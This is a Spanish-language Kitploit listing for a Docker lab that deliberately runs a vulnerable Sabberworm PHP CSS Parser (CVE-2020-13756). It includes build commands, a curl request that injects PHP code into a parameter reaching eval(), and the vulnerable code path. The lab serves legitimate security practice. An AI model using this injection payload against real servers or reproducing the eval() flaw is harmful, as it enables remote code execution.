Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-13756-env — Entorno de prueba vulnerable para CVE-2020-13756 (Sabberworm PHP CSS Parser RCE) | Kitploit
Herramientas/GitHubGitHub/kre80r/cve-2020-13756-env
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubkre80r/cve-2020-13756-env

CVE-2020-13756-env

Entorno de prueba vulnerable para CVE-2020-13756 (Sabberworm PHP CSS Parser RCE)

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-13756 Entorno Vulnerable

Entorno de prueba vulnerable para CVE-2020-13756 - Ejecución Remota de Código en el Analizador CSS PHP de Sabberworm.

Detalles de la Vulnerabilidad

CampoValor
CVECVE-2020-13756
ProductoSabberworm PHP CSS Parser
Versiones Vulnerables< 8.3.1
SeveridadCrítica (CVSS 9.8)
TipoEjecución Remota de Código

Inicio Rápido (Una Línea)

root@kitploit:~
docker run -d -p 8080:80 $(docker build -q https://github.com/KrE80r/CVE-2020-13756-env.git)

O clonar y ejecutar:

root@kitploit:~
git clone https://github.com/KrE80r/CVE-2020-13756-env.git && cd CVE-2020-13756-env && docker-compose up -d

Configuración Manual

root@kitploit:~
# Clone repository
git clone https://github.com/KrE80r/CVE-2020-13756-env.git
cd CVE-2020-13756-env

# Build and run
docker build -t sabberworm-vuln .
docker run -d -p 8080:80 sabberworm-vuln

Verificar la Vulnerabilidad

root@kitploit:~
# Test RCE - should print "VULN_TEST" in response
curl "http://localhost:8080/?n=100;printf(%22VULN_TEST%22);"

La salida esperada contiene VULN_TEST al principio, lo que demuestra la ejecución de código.

Prueba con Nuclei

root@kitploit:~
nuclei -t CVE-2020-13756.yaml -u http://localhost:8080 -debug

Detalles Técnicos

La vulnerabilidad existe en la función getSelectorsBySpecificity() que pasa entrada de usuario sin sanitizar a eval():

root@kitploit:~
// Vulnerable code path
$selectors = $doc->getSelectorsBySpecificity('> ' . $_GET['n']);
// When n=100;printf("test"); the eval() executes: eval('> 100;printf("test");')

Referencias

  • NVD
  • Commit de Corrección
  • Divulgación Completa
  • PacketStorm

Descargo de Responsabilidad

Este entorno es solo para pruebas de seguridad autorizadas. No lo use contra sistemas sin permiso.

Autor

KrE80r - Investigación de Seguridad

Descargar herramienta